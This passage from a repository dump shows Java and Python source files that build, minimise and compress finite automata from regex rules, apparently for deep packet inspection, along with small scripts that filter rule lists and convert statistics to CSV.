"blob_id": "b2098261e707f2a94900b70cabf2daa5efda29e1",
"content_id": "3760c4a17036ece6fc8ba5cb1412d46d17938b8b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 510,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 15,
"path": "/src/main/java/main/io/Static.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package main.io;\n\nimport java.nio.file.Path;\nimport java.nio.file.Paths;\n\npublic class Static {\n public static String INPUT = \"./input\";\n public static String TOP_10 = INPUT + \"/top10\";\n public static String TOP_10_GROUPS = TOP_10 + \"/top10groups.txt\";\n public static String FILTERED = INPUT + \"/filtered.txt\";\n public static String VALIDATION = \"./output/graph/validation\";\n public static String SINGLE_DFA = INPUT + \"/single/single_dfa.txt\";\n\n public static boolean DEBUG_RUN = false;\n}\n"
},
{
"alpha_fraction": 0.48197969794273376,
"alphanum_fraction": 0.48401015996932983,
"avg_line_length": 38.400001525878906,
"blob_id": "1add8c5e2cf01ec8b705a6419c67f2afe8f6971e",
"content_id": "3eaba9f84ccac477a0eeef9093dde771432cf5db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 3940,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 100,
"path": "/src/main/java/automaton/algo/compressor/heuristic/ColorizationCompressor.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.algo.compressor.heuristic;\n\nimport automaton.dfa.Dfa;\nimport automaton.dfa.Node;\nimport intgraph.ColorizatorSimple;\nimport intgraph.IntGraph;\nimport main.debug.HeuristicColors;\nimport util.IntMonitor;\nimport util.Utils;\n\nimport java.util.ArrayList;\nimport java.util.HashMap;\nimport java.util.List;\nimport java.util.Map;\n\npublic class ColorizationCompressor {\n ArrayList<Node> ordered;\n HashMap<Node, Integer> index;\n\n IntMonitor __sizeMonitor = new IntMonitor(\"Nodes remaining\", 50, IntMonitor.Mode.LINEAR);\n\n public void compress(Dfa dfa) {\n boolean progress = true;\n while (progress) {\n progress = false;\n IntGraph graph = buildGraph(dfa);\n if (__sizeMonitor.update(index.size())) {\n Utils.writeTo(\"./output/graph/checkpoints/colors/g\" + HeuristicColors.groupId1 + \"/at\" + index.size() + \".txt\",\n dfa.print(Dfa.PrintingMode.SERIALIZE));\n }\n// System.err.println(\"Nodes remaining: \" + ordered.size());\n List<List<Integer>> colors = new ColorizatorSimple().colorize(graph);\n// System.err.println(\"Colors found: \" + ordered.size());\n if (colors.size() != dfa.nodesCount()) {\n progress = true;\n Map<Integer, Node> mapping = new HashMap<>();\n for (List<Integer> colorEntries : colors) {\n Node colorNode = new Node();\n boolean anyTerminal = false;\n for (Integer entry : colorEntries) {\n mapping.put(entry, colorNode);\n Node oldNode = ordered.get(entry);\n if (oldNode.isTerminal()) {\n colorNode.setTerminal(oldNode.getTerminal());\n assert !anyTerminal;\n anyTerminal = true;\n }\n }\n }\n for (List<Integer> colorEntries : colors) {\n HashMap<Character, Node> newEdges = new HashMap<>();\n colorEntries.forEach(entryId -> {\n ordered.get(entryId).getEdges().forEach((c, node) -> {\n Node newNode = mapping.get(index.get(node));\n Node __replaced = newEdges.put(c, newNode);\n assert __replaced == null || __replaced == newNode;\n });\n });\n mapping.get(colorEntries.get(0)).setEdges(newEdges);\n }\n dfa.setStart(mapping.get(index.get(dfa.getStart())));\n }\n }\n }\n\n public IntGraph buildGraph(Dfa dfa) {\n index = new HashMap<>();\n ordered = new ArrayList<>(dfa.allNodes());\n for (int i = 0; i < ordered.size(); i++) {\n index.put(ordered.get(i), i);\n }\n IntGraph graph = new IntGraph(ordered.size());\n for (int i = 0; i < ordered.size(); i++) {\n Node a = ordered.get(i);\n Map<Character, Node> aEdges = a.getEdges();\n for (int j = 0; j < i; j++) {\n Node b = ordered.get(j);\n Map<Character, Node> bEdges = b.getEdges();\n boolean failed = false;\n\n if (a.isTerminal() || b.isTerminal()) {\n failed = true;\n } else {\n for (Map.Entry<Character, Node> entry : aEdges.entrySet()) {\n char c = entry.getKey();\n Node target = entry.getValue();\n if (bEdges.containsKey(c) && bEdges.get(c) != target) {\n failed = true;\n }\n }\n }\n\n if (failed) {\n graph.addEdge2(i, j);\n }\n }\n }\n return graph;\n }\n}\n"
},
{
"alpha_fraction": 0.6531165242195129,
"alphanum_fraction": 0.6558265686035156,
"avg_line_length": 35.900001525878906,
"blob_id": "6233e80928dd84492dbbed1227b95674189daa23",
"content_id": "2b2dcbbb10914b9313c18e410f7476a84dbbbee6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 369,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 10,
"path": "/input/select.py",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "\nwith open('./numbers.txt') as numbers:\n selected_numbers = list(map(int, numbers.read().rstrip().split(', ')))\n\nwith open('./selected.txt') as filtered:\n rules_list = list(filtered.read().rstrip().split('\\n'))\n\nselected_list = [rules_list[i - 1] for i in selected_numbers]\n\nwith open('./output.txt', 'w') as selected:\n selected.write(\"\\n\".join(selected_list))"
},
{
"alpha_fraction": 0.5992708802223206,
"alphanum_fraction": 0.6045989990234375,
"avg_line_length": 43.02469253540039,
"blob_id": "119647beb97a29b9d6be66c1616e0f996ebd4c67",
"content_id": "4334c295138177e1b1efbee1603dd8d65881d3ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 3566,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 81,
"path": "/src/main/java/automaton/transition/Transitions.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.transition;\n\nimport parsing.ParsingError;\nimport parsing.RegexConfig;\nimport util.MyList;\nimport util.MySet;\n\nimport java.util.*;\n\npublic class Transitions {\n final private static Map<String, Transition> transitionMap = generateTransitionMap();\n final public static char MAX_CHAR = 257;\n\n private static HashMap<String, Transition> generateTransitionMap() { // TODO: pass config\n HashMap<String, Transition> transitionMap = new HashMap<>();\n transitionMap.put(\"\\\\n\", new SingleElementTransition('\\n'));\n transitionMap.put(\"\\\\t\", new SingleElementTransition('\\t'));\n transitionMap.put(\"\\\\r\", new SingleElementTransition('\\r'));\n transitionMap.put(\"\\\\f\", new SingleElementTransition('\\f'));\n transitionMap.put(\"$\", new EofTransition()); // TODO: special character\n transitionMap.put(\"^\", new StartTransition());\n char[] symbols = { '.', '/', '\\\\', '-', '?', '(', ')', ':', '^', '\\'', ',', ';', '=', '<', '>', '*', '&', '{',\n '}', '|', '+', '%', '!', '_', '[', ']' };\n for (char symbol: symbols) {\n transitionMap.put(\"\\\\\" + symbol, new SingleElementTransition(symbol));\n }\n\n Set<Character> sClass = MySet.of('\\n', '\\t', '\\r', '\\f', ' ');\n transitionMap.put(\"\\\\s\", new CollectionTransition(sClass));\n\n transitionMap.put(\"\\\\h\", new SingleElementTransition('\\t')); // TODO: support Unicode / filter rules\n\n Transition digitTransition = new RangeTransition('0', '9');\n transitionMap.put(\"\\\\d\", digitTransition);\n\n Transition alphaTransition1 = new RangeTransition('a', 'z');\n Transition alphaTransition2 = new RangeTransition('A', 'Z');\n CollectionTransition wordTransition = new CollectionTransition(alphaTransition1, alphaTransition2);\n wordTransition.addMore(new SingleElementTransition('_'));\n wordTransition.addMore(digitTransition);\n transitionMap.put(\"\\\\w\", wordTransition);\n\n transitionMap.put(\"\\\\S\", new ComplementTransition(transitionMap.get(\"\\\\s\")));\n transitionMap.put(\"\\\\D\", new ComplementTransition(transitionMap.get(\"\\\\d\")));\n transitionMap.put(\"\\\\W\", new ComplementTransition(transitionMap.get(\"\\\\w\")));\n\n transitionMap.put(\"\\\\i\", new CollectionTransition(wordTransition, new SingleElementTransition(':')));\n\n return transitionMap;\n }\n\n public static Transition ofString(String s, RegexConfig config) {\n return ofStringImpl(s, config, false);\n }\n\n public static Transition ofStringImpl(String s, RegexConfig config, boolean literal) {\n if (s.equals(\".\")) {\n return new RangeTransition((char) 0, (char) 255);\n }\n if (literal) {\n if (s.equals(\"$\") | s.equals(\"^\")) {\n return new SingleElementTransition(s.charAt(0));\n }\n }\n if (transitionMap.containsKey(s)) {\n return transitionMap.get(s);\n }\n if (s.length() == 1) {\n char c = s.charAt(0);\n if (config.isCaseInsensitive() && Character.isAlphabetic(c)) {\n List<Character> list = MyList.of(Character.toUpperCase(c), Character.toLowerCase(c));\n return new CollectionTransition(list);\n }\n return new SingleElementTransition(c);\n }\n if (s.startsWith(\"\\\\x\")) {\n return new SingleElementTransition((char) Integer.parseInt(s.substring(2), 16));\n }\n throw new ParsingError(\"Unexpected character sequence for transition: `\" + s + \"`\");\n }\n}\n"
},
{
"alpha_fraction": 0.6318840384483337,
"alphanum_fraction": 0.6405797004699707,
"avg_line_length": 37.44444274902344,
"blob_id": "47500156fc99f93bf157eb5892f320fb7663978e",
"content_id": "381630b2bdd99c03cef500d29cc6a50a03d3ba53",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 345,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 9,
"path": "/input/remove_used.py",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "with open('./ind660.txt') as used_fs:\n used = set(used_fs.read().rstrip().split('\\n'))\n\nwith open('./filtered.txt') as filtered_fs:\n rules = list(filtered_fs.read().rstrip().split('\\n'))\n\nwith open('./selected.txt', 'w') as selected_fs:\n selected = [rule for rule in rules if rule not in used]\n selected_fs.write(\"\\n\".join(selected))"
},
{
"alpha_fraction": 0.6988285183906555,
"alphanum_fraction": 0.7001065015792847,
"avg_line_length": 34.30826950073242,
"blob_id": "17fde64646875f830d051c77a824a4e028105fc8",
"content_id": "c948fa59d95b4edc9fba9b48d1e5d1a344992512",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 4695,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 133,
"path": "/src/main/generated/antlr/RegexBaseVisitor.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "// Generated from F:/repo/java/dpi-fp/src/main/grammar\\Regex.g4 by ANTLR 4.8\npackage antlr;\nimport org.antlr.v4.runtime.tree.AbstractParseTreeVisitor;\n\n/**\n * This class provides an empty implementation of {@link RegexVisitor},\n * which can be extended to create a visitor which only needs to handle a subset\n * of the available methods.\n *\n * @param <T> The return type of the visit operation. Use {@link Void} for\n * operations with no return type.\n */\npublic class RegexBaseVisitor<T> extends AbstractParseTreeVisitor<T> implements RegexVisitor<T> {\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitStart(RegexParser.StartContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitParams(RegexParser.ParamsContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitCharset(RegexParser.CharsetContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitCharsetRange(RegexParser.CharsetRangeContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitCharsetValues(RegexParser.CharsetValuesContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitExpr(RegexParser.ExprContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitExpr1(RegexParser.Expr1Context ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitPureExpr(RegexParser.PureExprContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitCharacter(RegexParser.CharacterContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitSpecial(RegexParser.SpecialContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitRepeatedExpr(RegexParser.RepeatedExprContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public 
T visitNumber(RegexParser.NumberContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitRangeCounter(RegexParser.RangeCounterContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitLBorderCounter(RegexParser.LBorderCounterContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitRBorderCounter(RegexParser.RBorderCounterContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitExactCounter(RegexParser.ExactCounterContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitOptionalExpr(RegexParser.OptionalExprContext ctx) { return visitChildren(ctx); }\n}"
},
{
"alpha_fraction": 0.4749999940395355,
"alphanum_fraction": 0.48586955666542053,
"avg_line_length": 33.074073791503906,
"blob_id": "62f5bbb83c2021608333cb3d03f4a4431617f7a3",
"content_id": "3a6feac753dce8b64858c6a896a72f2fb5d62fac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 3680,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 108,
"path": "/src/main/java/automaton/dfa/DfaGenerator.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.dfa;\n\nimport java.util.*;\nimport java.util.logging.Logger;\nimport java.util.stream.Collectors;\n\npublic class DfaGenerator {\n// private final int MAX_NODES = 20;\n// private final double EDGE_PROB = 0.2;\n// private final char ALPHA_BORDER = 'c';\n// private final double TERMINAL_PROB = 0.33;\n\n private final int MAX_NODES = 20;\n private final double EDGE_PROB = 0.4;\n private final char ALPHA_BORDER = 'f';\n private final double TERMINAL_PROB = 0.33;\n\n private Random random;\n private int nNodes;\n private ArrayList<Node> nodes;\n private HashMap<Node, Integer> nodeIds;\n\n private int nRuns = 0;\n\n public DfaGenerator() {\n random = new Random(131);\n }\n\n public DfaGenerator(Long seed) {\n random = new Random(seed);\n }\n\n public Dfa generateNext() {\n nRuns++;\n Logger.getGlobal().info(\"Generation #\" + nRuns);\n nNodes = random.nextInt(MAX_NODES) + 2;\n nodes = new ArrayList<>(nNodes);\n nodeIds = new HashMap<>(nNodes);\n for (int i = 0; i < nNodes; i++) {\n Node node = new Node();\n nodes.add(node);\n nodeIds.put(node, i);\n }\n\n for (int i = 0; i < nNodes; i++) {\n Node node = nodes.get(i);\n if (i > 0 && random.nextDouble() <= TERMINAL_PROB) {\n node.setTerminal(Collections.singletonList(i));\n } else {\n for (char c = 'a'; c <= ALPHA_BORDER; c++) {\n if (random.nextDouble() <= EDGE_PROB) {\n node.addEdge(c, nodes.get(random.nextInt(nNodes - 1)));\n }\n }\n }\n }\n\n return shrinkStage1(new Dfa(nodes.get(0)));\n }\n\n private Dfa shrinkStage1(Dfa dfa) {\n if (nRuns == 48) {\n nRuns = 100;\n }\n List<Integer> mergeTargets = new ArrayList<>(nNodes);\n for (int i = 0; i < nNodes; i++) {\n Node node = nodes.get(i);\n List<Node> collectedTerminals = new Dfa(node).allNodes().stream()\n .filter(Node::isTerminal)\n .collect(Collectors.toList());\n if (collectedTerminals.size() == 0) {\n mergeTargets.add(-1);\n } else if (collectedTerminals.size() == 1) {\n mergeTargets.add(collectedTerminals.get(0).getTerminal().get(0));\n } else {\n mergeTargets.add(null);\n }\n }\n for (int i = 0; i < nNodes; i++) {\n Integer targetTerminal = mergeTargets.get(i);\n if (targetTerminal == null) {\n Node node = nodes.get(i);\n node.setEdges(node.getEdges().entrySet().stream()\n .map(entry -> {\n Integer newTarget = mergeTargets.get(nodeIds.get(entry.getValue()));\n if (newTarget != null) {\n if (newTarget == -1) {\n return null;\n }\n entry.setValue(nodes.get(newTarget));\n }\n return entry;\n })\n .filter(Objects::nonNull)\n .collect(Collectors.toMap(Map.Entry::getKey, Map.Entry::getValue)));\n }\n }\n Integer newStartId = mergeTargets.get(nodeIds.get(dfa.getStart()));\n if (newStartId != null) {\n if (newStartId == -1) {\n return generateNext();\n }\n return new Dfa(nodes.get(newStartId));\n }\n return dfa;\n }\n\n}\n"
},
{
"alpha_fraction": 0.6912083029747009,
"alphanum_fraction": 0.6938068270683289,
"avg_line_length": 40.23214340209961,
"blob_id": "acd8ed2ff1c51fbb11f371efb5eb05b5d2ab4105",
"content_id": "c4ce973ce06c81bc9d7d169f3dec0edf85c39000",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 2309,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 56,
"path": "/src/main/java/main/graph/DeserializeMetric.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package main.graph;\n\nimport automaton.algo.compressor.recursive.RecursiveCompressorStatic;\nimport automaton.dfa.Dfa;\n\nimport java.io.IOException;\nimport java.nio.file.Files;\nimport java.nio.file.Paths;\n\nimport static main.Main.compress;\n\npublic class DeserializeMetric {\n public static void main(String[] args) throws IOException {\n// Dfa modified = Dfa.parseDfa(Files.newBufferedReader(Paths.get(\"./output/graph/result.txt\")), Dfa.ParsingMode.DESERIALIZE);\n Dfa modified = Dfa.parseDfa(Files.newBufferedReader(Paths.get(\"./output/graph/dfa_minimized_610.txt\")), Dfa.ParsingMode.DESERIALIZE);\n\n// Dfa dfaSingleMin = minimizeHopcroft(convert(Nfa.union(nfasSingle)));\n// System.out.println(\"Single-terminal-minimized: \" + dfaSingleMin.nodesCount());\n\n// Dfa combined = convert(Nfa.union(nfas));\n// System.out.println(\"Combined: \" + combined.nodesCount());\n// Dfa dfaMin = minimizeHopcroft(combined);\n// System.out.println(\"Minimized: \" + dfaMin.nodesCount());\n\n// System.out.println(\"Minimized-cut: \" + (dfaMin.cutCount() + nfas.size()));\n\n// Dfa modified = new ThompsonModified().run(nfas);\n System.out.println(\"ThompsonModified: \" + modified.nodesCount());\n// Utils.writeTo(\"./output/graph/result.txt\", modified.print(Dfa.PrintingMode.SERIALIZE));\n\n\n\n// Dfa modifiedMin = minimizeHopcroft(modified);\n\n// Dfa modifiedCopy = Dfa.parseDfa(Files.newBufferedReader(Paths.get(\"./output/graph/result.txt\")), Dfa.ParsingMode.DESERIALIZE);\n Dfa modifiedCopy = Dfa.parseDfa(Files.newBufferedReader(Paths.get(\"./output/graph/dfa_minimized_610.txt\")), Dfa.ParsingMode.DESERIALIZE);\n new RecursiveCompressorStatic().compress(modifiedCopy);\n System.out.println(\"ThompsonModifiedRecursive: \" + modifiedCopy.nodesCount());\n int x = modifiedCopy.nodesCount();\n compress(modifiedCopy);\n assert x == modifiedCopy.nodesCount();\n\n compress(modified);\n System.out.println(\"ThompsonModifiedHeuristic: \" + modified.nodesCount());\n\n new RecursiveCompressorStatic().compress(modified);\n System.out.println(\"HeuristicThenRecursive: \" + modified.nodesCount());\n\n\n\n// modifiedMinCopy.print();\n\n System.out.println();\n System.out.flush();\n }\n}\n"
},
{
"alpha_fraction": 0.5777778029441833,
"alphanum_fraction": 0.5908045768737793,
"avg_line_length": 31.625,
"blob_id": "378446a7102fdf5816970613751a59abe4227d89",
"content_id": "9a0432c9f89955ad75b3fb429d0b4065d7928740",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1305,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 40,
"path": "/py_util/list_csv_convert.py",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "import csv\nimport re\n\n\n# with open('./data/top10/top10stats.txt', 'r') as list_file:\nwith open('./data/top10/top10recursive.txt', 'r') as list_file:\n segments = list_file.read().rstrip('\\n').split('\\n\\n')\n \n\nparsed_segments = []\nall_names = {'size'}\nfor segment in segments:\n segment = segment.split('\\n')\n segment_dict = {}\n if re.search(r\"\\d+\", segment[0]) is None:\n print(\"\\n===\\n\".join(segments))\n segment_dict['size'] = re.search(r\"\\d+\", segment[0]).group()\n # print(re.search(r\"\\d+\", segment[0]).group())\n for row in segment[1:]:\n entry = re.search(r\".*: \", row)\n name = entry.group()[:-2].replace('-', '_')\n value = row[entry.end():]\n # print(entry.group())\n # print(value)\n # print(row)\n # print('===')\n segment_dict[name] = value\n all_names.add(name)\n parsed_segments.append(segment_dict)\n\n\n# with open('./data/refined/top10.csv', 'w') as csvfile:\nwith open('./data/refined/top10recursive.csv', 'w') as csvfile:\n results_writer = csv.writer(csvfile, quoting=csv.QUOTE_MINIMAL)\n index = list(all_names)\n results_writer.writerow(index) \n for segment_dict in parsed_segments:\n row = [segment_dict[name] for name in index]\n # print(row)\n results_writer.writerow(row)\n"
},
{
"alpha_fraction": 0.6600000262260437,
"alphanum_fraction": 0.6600000262260437,
"avg_line_length": 18.230770111083984,
"blob_id": "7ae4124200a294e6925bf3867022b7d2a840e55e",
"content_id": "473cb8774d2e5282090c272fe7dfb81fb3328b00",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 250,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 13,
"path": "/src/main/java/util/MySet.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package util;\n\nimport java.util.Arrays;\nimport java.util.HashSet;\nimport java.util.List;\nimport java.util.Set;\n\npublic class MySet {\n @SafeVarargs\n public static <T> Set<T> of(T ... a) {\n return new HashSet<T>(Arrays.asList(a));\n }\n}\n"
},
{
"alpha_fraction": 0.5549450516700745,
"alphanum_fraction": 0.5668498277664185,
"avg_line_length": 35.400001525878906,
"blob_id": "85dec5e7cf024d0860298f8a1d90e123b90507a8",
"content_id": "b1f12fb3979d83bf80e515980cee7afadf420d9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 2184,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 60,
"path": "/src/main/java/intgraph/ChromaticNumberCalculator.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package intgraph;\n\nimport util.IntMonitor;\n\nimport java.util.*;\nimport java.util.stream.Collectors;\n\npublic class ChromaticNumberCalculator {\n private IntMonitor __debugNodesSize = new IntMonitor(\"Remaining nodes\", 100, IntMonitor.Mode.LINEAR);\n// private IntMonitor __debugEdgesSize = new IntMonitor(\"Remaining edges\", 100, IntMonitor.Mode.LINEAR);\n\n public int calculate(IntGraph graph) { // No one-node loops\n int colors = 0;\n while (graph.nodes.size() != 0) {\n graph = processStep(graph);\n colors++;\n }\n return colors;\n }\n\n private IntGraph processStep(IntGraph graph) {\n int edges = graph.nodes.stream().map(node -> node.edges.size()).reduce(0, Integer::sum) / 2;\n __debugNodesSize.update(graph.nodes.size());\n\n HashMap<Integer, Integer> penalty = new HashMap<>();\n PriorityQueue<IntGraph.IntNode> queue = new PriorityQueue<>(20, new Comparator<IntGraph.IntNode>() {\n @Override\n public int compare(IntGraph.IntNode o1, IntGraph.IntNode o2) {\n return -Integer.compare(o1.edges.size() - penalty.getOrDefault(o1.id, 0),\n o2.edges.size() - penalty.getOrDefault(o2.id, 0));\n }\n });\n\n queue.addAll(graph.nodes);\n IntGraph future = new IntGraph();\n HashMap<Integer, Integer> toFuture = new HashMap<>();\n while (edges != 0) {\n IntGraph.IntNode cur = queue.remove();\n\n int newId = future.addNode();\n toFuture.put(cur.id, newId);\n\n assert cur.edges.size() - penalty.getOrDefault(cur.id, 0) > 0 : cur.id;\n\n for (int target : cur.edges) {\n if (!toFuture.containsKey(target)) {\n edges--;\n penalty.put(target, penalty.getOrDefault(target, 0) + 1);\n boolean __success = queue.remove(graph.nodes.get(target));\n assert __success;\n queue.add(graph.nodes.get(target));\n } else {\n future.addEdge2(newId, toFuture.get(target));\n }\n }\n }\n\n return future;\n }\n}\n"
},
{
"alpha_fraction": 0.4724409580230713,
"alphanum_fraction": 0.47356581687927246,
"avg_line_length": 32.54716873168945,
"blob_id": "f1a53af4945f2602ad0ba77f86c849c610547d50",
"content_id": "32a4d2538d2e19e506b0a2f09c43b4143f20e347",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1778,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 53,
"path": "/src/main/java/automaton/algo/compressor/validator/HeuristicValidator.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.algo.compressor.validator;\n\nimport automaton.dfa.Dfa;\nimport automaton.dfa.Node;\nimport util.Pair;\n\nimport java.util.*;\nimport java.util.stream.Collectors;\n\npublic class HeuristicValidator {\n public boolean test(Dfa dfa) {\n Map<Node, Set<Pair<Character, Node>>> mp = new HashMap<>();\n HashSet<Node> nodes = new HashSet<>(dfa.allNodes());\n for (Node node : nodes) {\n mp.put(node, new HashSet<>());\n }\n for (Node node : nodes) {\n node.getEdges().forEach((c, target) -> {\n mp.get(target).add(new Pair<>(c, node));\n });\n }\n\n ArrayList<Node> ordered = new ArrayList<>(nodes);\n ordered = ordered.stream().filter(Objects::nonNull).collect(Collectors.toCollection(ArrayList::new));\n for (int i = 0; i < ordered.size(); i++) {\n Node a = ordered.get(i);\n if (a == null || a.isTerminal()) {\n continue;\n }\n Map<Character, Node> aEdges = a.getEdges();\n for (int j = 0; j < i; j++) {\n Node b = ordered.get(j);\n if (b == null || b.isTerminal()) {\n continue;\n }\n Map<Character, Node> bEdges = b.getEdges();\n boolean failed = false;\n for (Map.Entry<Character, Node> entry : aEdges.entrySet()) {\n char c = entry.getKey();\n Node target = entry.getValue();\n if (bEdges.containsKey(c) && bEdges.get(c) != target) {\n failed = true;\n }\n }\n\n if (!failed) {\n return false;\n }\n }\n }\n return true;\n }\n}\n"
},
{
"alpha_fraction": 0.5986078977584839,
"alphanum_fraction": 0.6004640460014343,
"avg_line_length": 34.3278694152832,
"blob_id": "983ab647c5826c9db04c8d306b39b547da996500",
"content_id": "24a45e6d758e4a5e92af8d9681b7955c566a3b75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 4310,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 122,
"path": "/src/main/java/main/graph/GroupsMetric.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package main.graph;\n\nimport automaton.algo.compressor.recursive.RecursiveCompressorDynamic;\nimport automaton.algo.thompson.ThompsonModified;\nimport automaton.dfa.Dfa;\nimport automaton.nfa.Nfa;\nimport main.Main;\nimport main.io.Input;\nimport main.io.Static;\nimport util.Utils;\n\nimport java.io.IOException;\nimport java.util.List;\nimport java.util.stream.Collectors;\n\nimport static main.Main.*;\n\npublic class GroupsMetric {\n public static void main(String[] args) throws IOException {\n List<List<String>> groupRules = Input.readGroups(Static.FILTERED, Static.TOP_10_GROUPS);\n\n for (List<String> group : groupRules) {\n processGroup(group);\n }\n }\n\n public static void processGroup(List<String> rules) {\n System.out.println(\"Total \" + rules.size() + \" rules\");\n\n List<Nfa> nfas = rules.parallelStream()\n .map(Main::buildNfa)\n .collect(Collectors.toList());\n for (int i = 0; i < nfas.size(); i++) {\n nfas.get(i).close(i);\n }\n\n // Nfa:\n List<Nfa> nfasSingle = rules.parallelStream()\n .map(Main::buildNfa)\n .peek(nfa -> nfa.close(1))\n .collect(Collectors.toList());\n\n // Dfa:\n int sum = nfasSingle.parallelStream()\n .map(Main::convert)\n .map(Main::minimizeHopcroft)\n .map(Dfa::nodesCount)\n .reduce(Integer::sum)\n .orElse(0);\n System.out.println(\"Sum-of-single: \" + sum);\n\n int max = nfasSingle.parallelStream()\n .map(Main::convert)\n .map(Main::minimizeHopcroft)\n .map(Dfa::nodesCount)\n .reduce(Integer::max)\n 